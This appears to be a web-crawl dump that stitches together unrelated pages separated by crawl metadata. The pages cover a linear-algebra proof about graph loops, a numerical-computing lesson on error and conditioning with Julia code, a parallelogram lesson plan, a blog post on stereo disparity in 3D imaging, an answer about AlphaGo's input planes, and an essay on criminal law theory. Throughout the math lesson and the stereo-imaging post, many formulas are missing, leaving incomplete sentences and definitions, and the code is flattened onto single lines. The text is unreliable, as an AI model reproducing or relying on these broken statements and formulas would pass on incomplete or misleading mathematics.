Simplicial space. Encyclopedia of Mathematics. URL: http://encyclopediaofmath.org/index.php?title=Simplicial_space&oldid=31472 | <urn:uuid:990fb679-5649-4555-b04f-1998b67429d6> | CC-MAIN-2023-14 | https://encyclopediaofmath.org/index.php?title=Simplicial_space&oldid=31472 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945372.38/warc/CC-MAIN-20230325191930-20230325221930-00208.warc.gz | en | 0.888667 | 404 | 3.03125 | 3 |
If there's a unique two-step path between every pair of nodes in a directed graph, then every node has \(k\) neighbors and the graph has \(k\) loops, where \(k^2\) is the number of nodes in the graph.
Astonishingly, you can prove this result using the machinery of linear algebra. You represent the graph as a matrix \(M\) whose \((i,j)\) entry is one if nodes i and j are neighbors, or 0 otherwise. The sum of the diagonal entries (the trace of the matrix) tells you the number of loops. The trace is also equal to the sum of the generalized eigenvalues, counting repetitions, so you can count loops in a graph by finding all the eigenvalues of the corresponding matrix.
The property about paths translates into the matrix equation \(M^2 = J\), where \(J\) is a matrix of all ones. (The r-th power of a matrix counts r-step paths between nodes.) This matrix \(J\) has a number of special properties—multiplying a matrix by \(J\) computes its row/column totals (i.e. the number of neighbors for a graph!), multiplying \(J\) by \(J\) produces a scalar multiple of \(J\), and \(J\) zeroes-out any vector whose entries sum to zero; this is an \(n-1\) dimensional subspace. The property that \(M^2=J\), along with special properties of \(J\), allows you to conclude that higher powers of \(M\) are all just multiples of \(J\); in particular, examining \(M^3=MJ=JM\) reveals that every node in the graph has the same number of neighbors \(k\). So \(M^3 = kJ\). (And \(k^2 = n\) because \(k^2\) is the number of two-step paths, which lead uniquely to each node in the graph.) Notice that because of this neighbor property, \(M\) sends a column vector of all ones to a column vector of all k's, so \(M\) has an eigenvalue \(k\). Based on the powers of \(M\), \(M\) furthermore has \((n-1)\) generalized eigenvectors with eigenvalue zero. There are always exactly \(n\) independent generalized eigenvalues, and we've just found all of them. Their sum is \(0+0+0+\ldots+0+k = k\), which establishes the result.
The same procedure establishes a more general result: If there's a unique r-step path between every pair of nodes in a graph, then every node has k neighbors and the graph has k loops, where \(k^r\) is the number of nodes in the graph. | <urn:uuid:f72695bc-4308-494d-82b8-29fad0b552f0> | CC-MAIN-2023-14 | http://illuminium.org/loop-counting/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948620.60/warc/CC-MAIN-20230327092225-20230327122225-00608.warc.gz | en | 0.913334 | 586 | 3.03125 | 3 |
Error is the discrepancy between a quantity and the value used to represent it in the program. A result is accurate if its error is small. If is an approximation for , then
- the absolute error is , and
- the relative error is .
We are usually more interested in relative error, since the relevance of an error is usually in proportion to the quantity being represented. For example, misreporting the weight of an animal by one kilogram would be much more significant if the animal were a squirrel than if it were a blue whale.
sqrt(200.0), which returns the Float64-square-root of 200, yields
The actual decimal representation of is
The difference between these values, , is the absolute error, and is the relative error.
Sources of Numerical Error
There are a few categories of numerical error.
Roundoff error comes from rounding numbers to fit them into a floating point representation.
0.2 + 0.1is equal to in
Float64 arithmetic. The discrepancy between 0.3 and this value is roundoff error.
Truncation error comes from using approximate mathematical formulas or algorithms.
The Maclaurin series of is , so approximating as yields a truncation error equal to .
Newton's method approximates a zero of a function by starting with a value near the desired zero and defining for all .
Under certain conditions, converges to a zero of as . The discrepancy between and is the truncation error associated with stopping Newton's method at the $n$th iteration.
We may approximate using the sum . The error associated this approximation is a type of truncation error.
Statistical error arises from using randomness in an approximation.
We can approximate the average height of a population of 100,000 people by selecting 100 people uniformly at random and averaging their measured heights. The error associated with this approximation is an example of statistical error.
Discuss the error in each of the following scenarios using the terms roundoff error, truncation error, or statistical error.
- We use the trapezoid rule with 1000 trapezoids to approximate .
- We are trying to approximate for some function
fthat we can compute, and we attempt to do so by running
(f(5 + 0.5^100) - f(5))/0.5^100. We fail to get a reasonable answer.
- To approximate the minimum of a function , we evaluate at 100 randomly selected points in and return the smallest value obtained.
- The more trapezoids we use, the more accurate our answer will be. The difference between the exact answer and the value we get when we stop at 1000 trapezoids is truncation error.
- The real problem here is roundoff error.
5 + 0.5^100gets rounded off to 5.0, so the numerator will always evaluate to 0. However, even if we used a
BigFloatversion of each of these values, there would still be truncation error in this approximation, since the expression we used was obtained by cutting off the limit in the definition of the derivative at a small but positive increment size.
- This is an example of statistical error, since the output of the algorithm depends on the randomness we use to select the points.
The derivative of a single-variable function may be thought of as a measure of how the function stretches or compresses absolute error:
The condition number of a function measures how it stretches or compresses relative error. Just as the derivative helps us understand how small changes in input transform to small changes in output, the condition number tells us how a small relative error in the initial data of a problem affects the relative error of the solution. We will use the variable to denote a problem's initial data and to denote the solution of the problem with initial data .
The condition number of a function is defined to be the absolute value of the ratio of the relative change in output of the function to a very small relative change in the input. The condition number of a problem is the condition number of the function which maps the problem's initial data to its solution.
If is the map from the initial data of a problem to its solution , then the condition number of the problem is
Show that the condition number of is constant, for any .
Solution. We have
for all .
Show that the condition number of the function is very large for values of near 1.
Solution. We substitute into the formula for condition number and get
for values of near . This expression goes to infinity as , so the condition number is very large.
Subtracting 1 from two numbers near 1 preserves their
If , then the solution of the equation is . If we change the initial data to , then the solution changes to , which represents a relative change of
in the solution. The relative change in input is , so taking the absolute value of the ratio of to and sending , we see that condition number of this problem is .
Consider a function . If the input changes from to for some small value , then the output changes to approximately . Calculate the ratio of the relative change in the output to the relative change in the input, and show that you get
Solution. The relative change in output is
and the relative change in input is . Dividing these two quantities gives
More generally, if the initial data is in and the solution is in , then the condition number is defined to be
where denotes the
Well conditioned and ill-conditioned problems
If the condition number of a problem is very large, then small errors in the problem data lead to large changes in the result. A problem with large condition number is said to be ill-conditioned. Unless the initial data can be specified with correspondingly high precision, it will not be possible to solve the problem meaningfully.
Example Consider the following matrix equation for and .
Find the values of for which solving this equation for is ill-conditioned.
Solution. If , then the solution of this equation is
Using the formula for above, we can work out (after several steps) that
If is very close to , then is very large, and the matrix is ill-conditioned:
[2.01 3; 6 9] \ [4; 5]
[2.02 3; 6 9] \ [4; 5]
Machine epsilon, denoted , is the maximum relative error associated with rounding a real number to the nearest value representable as a given floating point type. For
Float64, this value is .
A competing convention—more widely used outside academia—defines to be the difference between 1 and the next representable number, which for
Float64is . This is the value returned by
eps() in Julia. Since we typically introduce a relative error on the order of to encode the initial data of a problem, the relative error of the computed solution should be expected to be no smaller than , regardless of the algorithm used.
An algorithm used to solve a problem is stable if it is approximately as accurate as the condition number of the problem allows. In other words, an algorithm is unstable if the answers it produces have relative error many times larger than .
Consider the problem of evaluating near for values of near 0. Show that the problem is well-conditioned, but algorithm of evaluating the expression following the order of operations is unstable.
Comment on whether there are stable algorithms for evaluating near .
Solution. Substituting this function into the condition number formula, we find that
Therefore, , which means that this problem is well-conditioned at 0. However, the algorithm of substituting directly includes an ill-conditioned step: subtracting 1.
What's happening is that a roundoff error of approximately is introduced when is rounded to the nearest
Float64. When 1 is subtracted, we still have an error of around . Since , we will have , and that means that the relative error in the value we find for will be approximately . If is small, this will be many times larger than .
There are stable algorithms for approximating near . For example, we could use the Taylor series
and approximate as a sum of the first several terms on the right-hand side. Since power functions are well-conditioned (and performing the subtractions is also well-conditioned as long as is small enough that each term is much smaller than the preceding one), this algorithm is stable. Alternatively, we can use the identity
which can be obtained by multiplying by and simplifying the numerator. Substituting into this expression is stable, because adding 1, square rooting, and reciprocating are well-conditioned.
Matrix condition number
The condition number of an matrix is defined to be the maximum condition number of the function as ranges over . The condition number of can be computed using its singular value decomposition:
Show that the condition number of a matrix is equal to the ratio of its largest and smallest singular values.
Interpret your results by explaining how to choose two vectors with small relative difference which are mapped to two vectors with large relative difference by , assuming that has a singular value which is many times larger than another. Use the figure below to help with the intuition.
Solution. The derivative of the transformation is the matrix itself, and the operator norm of is equal to its largest singular value. Therefore, to maximize , we minimize the ratio . This ratio is minimized when is the right singular vector with the least singular value. Therefore, the maximum possible value of is the ratio of the largest singular value of to the smallest singular value of .
Find the condition number of the function , where
A = [1 2; 3 4] and show that there is a vector and an error for which the relative error is indeed magnified by approximately the condition number of .
using LinearAlgebra A = [1 2; 3 4]
Solution. We choose
e to be the columns of in the singular value decomposition of
using LinearAlgebra A = [1 2; 3 4] U, S, V = svd(A) σmax, σmin = S κ = σmax/σmin v = V[:,2] e = V[:,1] rel_error_output = norm(A*(v+e) - A*v)/norm(A*v) rel_error_input = norm(v + e - v) / norm(v) rel_error_output / rel_error_input, κ
Integer or floating point arithmetic can overflow, and may do so without warning.
In September 2013, NASA lost touch with the Deep Impact space probe because systems on board tracked time as a 32-bit-signed-integer number of tenth-second increments from January 1, 2000. The number of such increments reached the maximum size of a 32-bit signed integer in August of 2013.
Errors resulting from performing ill-conditioned subtractions are called catastrophic cancellation.
Approximating with the result of
sqrt(10^6 + 1) - sqrt(10^6), we get a relative error of approximately , while using
1/(sqrt(10^6 + 1) + sqrt(10^6)) gives a relative error of (more than a thousand times smaller).
Use your knowledge of floating point arithmetic to explain why computing directly is much less precise than computing .
Solution. The gaps between successive representable positive values get wider as we move on the right on the number line. Therefore, the error of the first calculation is the roundoff error associated with calculating
sqrt(10^6+1), which is roughly .
The relative error in
1/(sqrt(10^6 + 1) + sqrt(10^6)), meanwhile, is approximately the same as the relative error in the calculation of
sqrt(10^6 + 1) + sqrt(10^6) (since the condition number of the reciprocal function is approximately 1). This relative error is only about .
If you rely on exact comparisons for floating point numbers, be alert to the differences between
Float64 arithmetic and real number arithmetic:
function increment(n) a = 1.0 for i = 1:n a = a + 0.01 end a end
increment(100) > 2
(increment(100) - 2) / eps(2.0)
Each time we add , we have to round off the result to represent it as a
Float64. These roundoff errors accumulate and lead to a result which is two ticks to the right of 2.0.
It is often more appropriate to compare real numbers using
\approx«tab»), which checks that two numbers and differ by at most .
Guess what value the following code block returns. Run it and see what happens. Discuss why your initial guess was correct or incorrect, and suggest a value near 0.1 that you could use in place of 0.1 to get the expected behavior.
function increment_till(t, step=0.1) x = 0.5 while x < t x += step end x end increment_till(1.0)
Solution. It's reasonable to guess that the returned value will be 1.0. However, it's actually approximately 1.1. The reason is that adding the Float64 representation of 0.1 ten times starting from 0.0 results in a number slightly smaller than 1.0. It turns out that 0.6 (the real number) is 20% of the way from the Float64 tick before it to the Float64 tick after it:
(1//10 - floor(2^53 * 1//10) // 2^53) * 2^53
This means that the Float64 sum is less than the mathematical sum after adding 0.1 once, then less after adding 0.1 again, and so on. By the time we we get to , we've lost a full tick spacing so after 5 iterations, is equal to .
We could use 1/8 = 0.125 instead of 0.1 to get the expected behavior, since small inverse powers of 2 and their sums with small integers can be represented exactly as 64-bit floating points numbers. | <urn:uuid:37f97b5a-c219-4100-bdb3-a5897c01b48e> | CC-MAIN-2023-14 | https://mathigon.org/course/numerical-computing/error | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945292.83/warc/CC-MAIN-20230325002113-20230325032113-00008.warc.gz | en | 0.908335 | 3,052 | 3.984375 | 4 |
Students were introduced to parallel lines in grade 4. While the standards do not explicitly state that students must work with parallelograms in grades 3–5, the geometry standards in those grades invite students to learn about and explore quadrilaterals of all kinds. The K–6 Geometry Progression gives examples of the kinds of work that students can do in this domain, including work with parallelograms.
In this lesson, students analyze the defining attributes of parallelograms, observe other properties that follow from that definition, and use reasoning strategies from previous lessons to find the areas of parallelograms.
By decomposing and rearranging parallelograms into rectangles, and by enclosing a parallelogram in a rectangle and then subtracting the area of the extra regions, students begin to see that parallelograms have related rectangles that can be used to find the area.
Throughout the lesson, students encounter various parallelograms that, because of their shape, encourage the use of certain strategies. For example, some can be easily decomposed and rearranged into a rectangle. Others—such as ones that are narrow and stretched out—may encourage students to enclose them in rectangles and subtract the areas of the extra pieces (two right triangles).
After working with a series of parallelograms, students attempt to generalize (informally) the process of finding the area of any parallelogram (MP8).
Note that these materials use the “dot” notation (for example \(2 \boldcdot 3\)) to represent multiplication instead of the “cross” notation (for example \(2 \times 3\)). This is because students will be writing many algebraic expressions and equations in this course, sometimes involving the letter \(x\) used as a variable. This notation will be new for many students, and they will need explicit guidance in using it.
- Compare and contrast (orally) different strategies for determining the area of a parallelogram.
- Describe (orally and in writing) observations about the opposites sides and opposite angles of parallelograms.
- Explain (orally and in writing) how to find the area of a parallelogram by rearranging or enclosing it in a rectangle.
Let’s investigate the features and area of parallelograms.
- I can use reasoning strategies and what I know about the area of a rectangle to find the area of a parallelogram.
- I know how to describe the features of a parallelogram using mathematical vocabulary.
A parallelogram is a type of quadrilateral that has two pairs of parallel sides.
Here are two examples of parallelograms.
A quadrilateral is a type of polygon that has 4 sides. A rectangle is an example of a quadrilateral. A pentagon is not a quadrilateral, because it has 5 sides.
Print Formatted Materials
Teachers with a valid work email address can click here to register or sign in for free access to Cool Down, Teacher Guide, and PowerPoint materials.
|Student Task Statements||docx|
|Cumulative Practice Problem Set||docx|
|Cool Down||Log In|
|Teacher Guide||Log In|
|Teacher Presentation Materials||docx| | <urn:uuid:e13526e7-eb59-4d4b-ba28-b09ba8f265ac> | CC-MAIN-2023-14 | https://im.kendallhunt.com/MS/teachers/1/1/4/preparation.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296944452.74/warc/CC-MAIN-20230322180852-20230322210852-00608.warc.gz | en | 0.858564 | 736 | 4.0625 | 4 |
One of our clients is heavily involved in 3D video and has been for several years. However, several are just now starting to think about it because of the uptick of interest in the consumer electronics world. Enough questions have been posed to us recently that it seemed worthwhile to me to pull together a few basic facts regarding 3D stereo-pair imaging and stereo disparity.
First, we need a simple model of a lens. Consider the diagram below:
In this picture, the long horizontal line that passes through the center of the lens is called the lens axis. The lens has the property that rays that pass through the center of the lens are undeviated. Therefore, the ray from the top of the tree, at a distance l to the left of the lens, passes straight through the center of the lens. (The tree has a height of h.) The lens also has the property that rays that arrive perpendicular to the lens are refracted to pass through the focal point of the lens. The focal point lies on the lens axis and is a distance f from the center of the lens. The intersection of these two rays shows where the image of the tree will be formed. You can see that the image of the tree is upside down, and has a new height h’. The image is formed a distance d to the right of the focal point.
By using similar triangles we see first that
Using a different pair of similar triangles we also see that
Solving the first equation above for h’. substituting the result into the second equation and simplifying, we derive the following relationship:
This is the fundamental equation of a simple lens. It shows that as the object gets further and further from the lens, i.e. as l increases, the distance of the image of the object from the focal plane decreases, i.e., d gets smaller. We can assume that the camera’s image sensor is located at a distance f from the lens, is perpendicular to the lens axis, and that all objects more than a certain distance away from the lens will be in focus. In other words, the image of all sufficiently distant objects will appear on the focal plane where the image sensor is located.
In the case of 3D video, two cameras are used to acquire a sequence of stereo-pair images, one from the left camera and one from the right. Different stereo geometries are possible, but the most common one is to place the two cameras horizontally apart from each other by a distance i, and to keep their focal planes coplanar. The diagram below illustrates this configuration:
The horizontal line at the bottom is the focal plane; it is clear from the diagram that the focal planes are coplanar. The lenses are a distance f from the focal plane and are separated by a distance of i from each other. We assume that a small object (or a point on a larger object) is located a distance l from the lens plane and a distance m to the right of the axis of the right lens. We want to know where the image of that object appears in the left and the right camera. In particular, we want to know if we overlaid the left image on top of the right image, how far apart would the images appear? Mathematically, we want to know the disparity, which we define to be
\rho = s1-s2
where s1 and s2 are the distances from the image point to the intersection of the lens axis with the focal plane for the left and the right cameras respectively. Note that we are assuming that the object being imaged is far enough away that its image forms on the focal plane.
Using our favorite trick of similar triangles we have the following two equations:
Solving the first equation for s1, the second equation for s2, taking the difference and simplifying yields
Although this expression was derived for an object to the right of the axis of the right camera, it is easy to show in a similar manner that it is also true for an object between the axes of the two cameras as well as for an object to the left of the axis of the left camera.
So what does this equation tell us? First, it says that for this particular camera geometry, the disparity is only a function of the separation between the two cameras, i, and the distance of the object from the lens plane, l. Second, the equation tells us that the disparity increases as we increase the separation between the cameras. Finally, it tells us that the disparity decreases as the object gets further away from the cameras, approaching zero for objects an infinite distance away. (You can see this when you watch 3D content without wearing the special 3D glasses: The “distant” objects can be seen by the naked eye, whereas the near objects appear blurry to the naked eye because the value of ρ is greater.)
It should be clear from this equation that if a stereo pair is available, and corresponding points can be found in the left and right pictures, that the disparity between those points can be measured, and the distance to the point can be computed.
Mike Perkins, Ph.D., is a managing partner of Cardinal Peak and an expert in algorithm development for video and signal processing applications. | <urn:uuid:655d2d62-6e15-4be6-987b-e5d49461c316> | CC-MAIN-2023-14 | https://www.cardinalpeak.com/blog/the-basics-of-3d-image-acquisition | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949694.55/warc/CC-MAIN-20230401001704-20230401031704-00608.warc.gz | en | 0.946049 | 1,214 | 3.546875 | 4 |
I wonder why these features are necessary, because I think a constant plane contains no information and it makes the the network larger and consequently harder to train.
In many implementations of convolutional layers, the filters do not neatly remain inside the features plane when "sliding" along it, but (conceptually) also partially go "outside" the plane (where always at least one "cell" of the filter will still be inside the plane). Intuitively, in the case of a $3\times3$ filter for example, you can imagine that we pad the input features with an extra border of size $1$, and this padding around the "real" input planes is filled with $0$s.
If it's possible for all input features to also have values of $0$, it may in some situations be difficult or impossible for the neural network to distinguish the "real" $0$ inputs from the $0$ entries in the padding around the board, i.e. it may struggle to know where the game board is and where the game board ends. Having a constant input plane that's always filled with $1$s can help in this respect, because that plane can always reliably be used to distinguish "real" cells that actually exist on the game board from positions that are just outside the game board.
As for the plane filled with $0$s... I have no idea why that would ever be useful. Maybe it was useful due to some peculiar implementation detail. In this thread, some people hypothesise that on specific hardware it might make some computations slightly more efficient because of the layout of the data in memory -- it causes the number of channels to be divisible by $8$, which will.. maybe help? I really don't know too much about this, but I do know that on a smaller scale, sometimes adding unused data in classes can indeed increase performance due to better layout in memory. I suppose it's also possible that it was accidentally added by mistake, or "just in case" and that it doesn't really have much of a purpose. The amount of hardware that the AlphaGo team had available to them is quite insane anyway, one channel more or less probably wasn't too big of a concern for them.
What's more, I don't understand the sharp sign here. Does it mean "the number"? But one number is enough to represent "the number of turns since a move was played", why eight?
This is explained in the "Features for policy/value network" paragraph in the paper. Quote from the paper:
"Each integer feature value is split into multiple $19 \times 19$" planes of binary values (one-hot encoding). For example, separate binary feature planes ares used to represent whether an intersection has $1$ liberty, $2$ liberties, $\dots$, $\geq 8$ liberties.
All feature planes used were strictly binary, no feature planes were used that had integer values $> 1$. This is quite common when possible, because neural networks tend to have a much easier time learning with binary features than with integer- or real-valued features. | <urn:uuid:82e5e96f-b242-4f53-8220-a9ec3c044aae> | CC-MAIN-2023-14 | https://ai.stackexchange.com/questions/11014/why-is-a-constant-plane-of-ones-added-into-the-input-features-of-alphago | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950422.77/warc/CC-MAIN-20230402074255-20230402104255-00608.warc.gz | en | 0.963812 | 641 | 2.734375 | 3 |
Theories of Criminal Law
Any theory of criminal law must explain why criminal law is distinctive—why it is a body of law worthy of separate attention. This entry begins by identifying features of criminal law that make this so (§1). It then asks what functions that body of law fulfills (§2), and what justifies its creation and continued existence (§3). If criminal law should be retained, we must consider its proper limits (§4). We must consider the conditions under which agents should be criminally responsible for whatever falls within those limits (§5). And we must ask which rules of procedure and evidence should govern efforts to establish criminal responsibility (§6). The focus of this entry is Anglo-American criminal law and scholarship thereon. Many of the questions raised, and many of the answers considered, are nonetheless of general application.
- 1. Features of Criminal Law
- 2. Functions of Criminal Law
- 3. Justifications of Criminal Law
- 4. The Limits of Criminal Law
- 5. Criminal Responsibility
- 6. Criminal Procedure and Evidence
- Academic Tools
- Other Internet Resources
- Related Entries
1. Features of Criminal Law
The life of the criminal law begins with criminalization. To criminalize an act-type—call it \(\phi\)ing—is to make it a crime to commit tokens of that type. Many claim that if it is a crime to \(\phi\) then \(\phi\)ing is legally wrongful—it is something that, in the eyes of the law, ought not to be done (Hart 1994, 27; Gardner 2007, 239; Tadros 2016, 91). On this view, we are not invited to commit crimes—like murder, or driving uninsured—just as long as we willingly take the prescribed legal consequences. As far as the law is concerned, criminal conduct is to be avoided. This is so whether or not we are willing to take the consequences.
It is possible to imagine a world in which the law gets its way—in which people uniformly refrain from criminal conduct. Obviously enough this is not the world in which we live. Imagine \(D\) is about to \(\phi\). If \(\phi\)ing is a crime, reasonable force may permissibly be used to prevent \(D\) \(\phi\)ing. Police officers and private persons alike have powers to arrest \(D\), and reasonable force may permissibly be used to make arrests effective.
These powers and permissions exist ex ante—prior, that is, to the commission of crime. We can add those that exist ex post—once crime has been committed. Imagine now that \(D\) has \(\phi\)ed. As well as the power to arrest \(D\), the criminal law confers a set of investigative powers designed to help generate evidence of \(D\)’s criminality: these include powers to stop and search, to carry out surveillance, and to detain suspects for questioning. If sufficient evidence is produced, and it is in the public interest to do so, \(D\) may be charged with a crime. To exercise these powers is to impose new duties on \(D\)—\(D\) must submit to the search, remain in detention, and turn up in court when required. For \(D\) to do otherwise—absent justification or excuse—is itself criminal. So reasonable force can permissibly be used against \(D\) if she refuses to co-operate.
The powers and permissions mentioned so far help \(D\)’s accusers put together their case against \(D\). By the time cases reach the courts those accusers are typically state officials (or those to whom the state has delegated official power). Some legal systems do make space for private prosecutions. But such prosecutions can be discontinued or taken over by state officials (and their delegates). Those officials (and delegates) can also continue proceedings in the face of private opposition, even when the opposition comes from those wronged by \(D\). In this way, the state exercises a form of control over criminal proceedings that is absent from legal proceedings of other kinds (Marshall and Duff 1998).
It may seem from the above that criminal proceedings are tilted heavily in favour of the accusing side. But the criminal law also confers rights on the accused that help protect \(D\) against her accusers (Ashworth and Zedner 2010, 82). These typically include the right to be informed of the accusations in question, the right to confidential access to a lawyer, and the privilege against self-incrimination. Most important of all, perhaps, is the right to be tried before an independent court that respects the presumption of innocence—that requires the prosecution to prove beyond a reasonable doubt that \(D\) committed the crime.
At least on paper, the procedural protections on offer in criminal proceedings are more robust than those available to the accused in legal proceedings of other kinds. This is explained in large part by the consequences of criminal conviction. If \(D\) is found guilty in a criminal court, \(D\) gains a criminal record. Depending on the crime, \(D\) may be disenfranchised, banned from certain professions, refused entry to other countries, and declined access to insurance, housing, and education (Hoskins 2014; 2016). This is to say nothing of criminal sentences themselves. Those sentences are typically punishments: the object of the exercise is that \(D\) suffer some harm or deprivation; \(D\) is to be made worse off than she otherwise would have been. This is not to say that suffering or deprivation must be the ultimate end of those who punish. That \(D\) suffer or lose out may be a means to any number of ultimate ends, including deterrence, restoration, or rehabilitation. What it cannot be is a mere side-effect. This is one thing that distinguishes criminal sentences—at least of the punitive kind—from the reparative remedies that are standard fare in civil law. Those remedies are designed to benefit \(P\)—to wipe out losses the plaintiff suffered in virtue of the defendant’s wrong. True, \(D\) often loses in the process of ensuring that \(P\) gains. But we can imagine cases in which this is not so: in which an award of damages leaves \(D\) no worse off than \(D\) was before. The award may remain a reparative success. It cannot be anything other than a punitive failure (Boonin 2008, 12–17; Gardner 2013).
We can now see that criminalizing \(\phi\)ing does much more than make \(\phi\)ing a legal wrong. It also makes it the case that \(\phi\)ing triggers a set of legal rights, duties, powers, and permissions, the existence of which distinguishes criminal law from the rest of the legal system. Those rights, duties, powers, and permissions are constitutive of a criminal process via which suspected \(\phi\)ing turns into arrest, charge, trial, conviction, and punishment. Obviously suspicions are sometimes misplaced. Innocent people’s lives are sometimes ruined in consequence. So it is no surprise that the most destructive powers and permissions are jealously guarded by the criminal law. Trials held in a university’s moot court might be meticulously fair to defendants. But a moot court has no power to detain us in advance, to require us to appear before it, or to sentence us to imprisonment. Force used to achieve any of these things would itself be criminal, however proportionate the resulting punishment might be. As this example shows, criminal law is characterised by an asymmetry—it bestows powers and permissions on state officials (and delegates) which are withheld from private persons, such that the latter are condemned as vigilantes for doing what the former lawfully do (Thorburn 2011a, 92–93; Edwards forthcoming). This remains the case—often to the great frustration of victims and their supporters—even if the official response, assuming it comes at all, will be woefully inadequate.
2. Functions of Criminal Law
Few deny that one function of criminal law is to deliver justified punishment. Some go further and claim that this is the sole function of criminal law (Moore 1997, 28–29). Call this the punitive view. Rules of criminal procedure and evidence, on this view, help facilitate the imposition of justified punishment, while keeping the risk of unjustified punishment within acceptable bounds. Rules of substantive criminal law help give potential offenders fair warning that they may be punished. Both sets of rules combat objections we might otherwise make to laws that authorize the intentional imposition of harm. To combat objections, of course, is not itself to make a positive case for such laws. That case, on the punitive view, is made by the justified punishments that criminal courts impose. This is not to say anything about what the justification of punishment is. It is merely to say that criminal law is to be justified in punitive terms.
Some object that this focus on punishment is misplaced. The central function criminal law fulfills in responding to crime, some say, is that of calling suspected offenders to account in criminal courts (Gardner 2007, 80; Duff 2010c, 16). This view puts the criminal trial at the centre, not just of criminal proceedings, but of criminal law as a whole (Duff 2013a, 196). Trials invite defendants to account for themselves either by denying the accusation that they offended, or by pleading a defence. The prospect of conviction and punishment puts defendants under pressure to offer an adequate account. Call this the curial view. It differs from the punitive view in two ways. First, part of the positive case for criminal law is independent of the imposition of punishment. Second, part of the positive case for imposing criminal punishment is dependent on the punishment being part of a process of calling to account. The following two paragraphs expand on both these claims.
As to the first, we often have reason to account for our actions to others. We can leave open for now the precise conditions under which this is so. But it is plausible to think that if Alisha steals from Bintu she has reason for account for the theft, and that if Chika intentionally kills Dawn she has reason to account for the killing. Defenders of the curial view argue that criminal proceedings are of intrinsic value when defendants (are called to) offer accounts of themselves that they have reason to offer in criminal courts (Gardner 2007, 190–191; Duff 2010c, 15–17). Imagine Alisha stole from Bintu because she was under duress. Imagine Chika intentionally killed Dawn to defend herself or others. Neither of these defendants, we can assume, is justifiably punished. On the punitive view, criminal law’s function does not stand to be fulfilled. On the curial view, things are different. Alisha and Chika both have reason to account for their behaviour—to explain what they did and why they did it. Criminal proceedings invite each to provide that account and put each under pressure to do so. Assuming Alisha and Chika have reason to account in a criminal court, proceedings in which they (are called to) do so are of intrinsic value. One of criminal law’s functions is fulfilled even if no-one is, or should be, punished.
To endorse the curial view is not, of course, to say that we should do away with criminal punishment. But it is to say that the connection between trial and punishment is not merely instrumental. Some think that the facts that make punishment fitting—say, culpable wrongdoing—obtain independently of criminal proceedings themselves (Moore 1997, 33). We use those proceedings to ensure that said facts are highly likely to have obtained—that \(D\) is highly likely to have culpably committed a wrong. On the curial view, the fact that \(D\) has been tried and found guilty (or has entered a guilty plea) is itself part of what makes it fitting that \(D\) is punished. The fitting way to respond to criminal wrongdoing, on this view, is to call the wrongdoer to account for her wrong. To call \(D\) to account is to attempt to both (a) get \(D\) to answer for wrongdoing (as occurs in court), and (b) get \(D\) to confront wrongdoing for which she has no satisfactory answer (as occurs when \(D\) is punished). So it is only because \(D\) has first been tried and found guilty (or has entered a guilty plea) that punishment counts as a fitting response to \(D\)’s wrong (Gardner 2007, 80; Duff 2013a, 205). We can see the implications of this view by imagining a world in which trials are abolished, because some new-fangled machine allows us to identify culpable wrongdoers with perfect accuracy. Having no doubt that \(D\) is guilty, we simply impose punishment on \(D\). On the curial view, the punishments we impose are inherently defective: they are not imposed as part of a process of calling to account. Though our new-fangled machine might justify doing away with trials—once we factor in how expensive they can be—we would lose something of value in doing away with them.
If criminal law does have a particular function, we can ask whether that function is distinctive of criminal law. We can ask, in other words, whether it helps distinguish criminal law from the rest of the legal system. It has been claimed that criminal law is distinctive in imposing punishment (Moore 1997, 18–30; Husak 2008, 72). One might also claim that criminal law alone calls defendants to account. But punishments are imposed in civil proceedings—exemplary damages are the obvious case. And it is arguable that civil proceedings also call defendants to account—that they too invite defendants to offer a denial or plead a defence; that they too use the prospect of legal liability to put defendants under pressure to account adequately (Duff 2014a).
In response, one might try to refine the function that is distinctive of criminal law. Perhaps criminal law’s function is to respond to public wrongs (whether by calling to account or punishing such wrongdoers), whereas the function of civil law is to respond to private wrongs. What we should make of this proposal depends on what a public wrong is (Lamond 2007; Lee 2015; Edwards and Simester 2017). To make progress, we can distinguish between primary duties—like duties not to rape or rob—and secondary duties—like duties to answer, or suffer punishment, for rape or robbery. We incur duties of the latter kind by breaching duties of the former.
If the public/private distinction is cashed out in terms of primary duties, then responding to public wrongs cannot be distinctive of criminal law. Many wrongs are both crimes and torts. So the two bodies of law often respond to breaches of the same primary duty. A more promising proposal looks to secondary duties. Perhaps criminal law’s distinctive function is to respond to wrongs on behalf of us all—to discharge secondary duties owed to the community as a whole (Duff 2011, 140). Perhaps the function of civil law is to respond to wrongs on behalf of some of us—to discharge secondary duties owed to particular individuals. This might be thought to explain why criminal proceedings, unlike civil proceedings, are controlled by state officials: why officials can initiate proceedings that individual victims oppose, and discontinue proceedings that victims initiate.
The view described in the previous paragraph conceives of criminal law as an instrument of the community—a way of ensuring that the community gets what it is owed from wrongdoers. Call it the communitarian view. If we combine this with the curial view, the distinctive function of criminal law is to seek answers owed to the community as a whole. One might doubt that the functions of criminal and civil law can be so neatly distinguished. It is arguable that civil law sometimes responds to wrongs on behalf of all of us—civil proceedings can be brought against \(D\) on the basis that her conduct is a nuisance to the public at large, or on the basis that \(D\) is a public official whose conduct is an abuse of power. More importantly, one might claim that in the case of paradigmatic crimes—like robbery, rape, or battery—criminal law responds to wrongs on behalf of particular individuals—on behalf of those who have been robbed, raped, or battered. On this view, a positive case for criminalization need not await the finding that \(D\) owes something to the whole community. It is at least sometimes enough that \(D\) owes something to those \(D\) has wronged, which \(D\) would fail to provide in the absence of criminal proceedings.
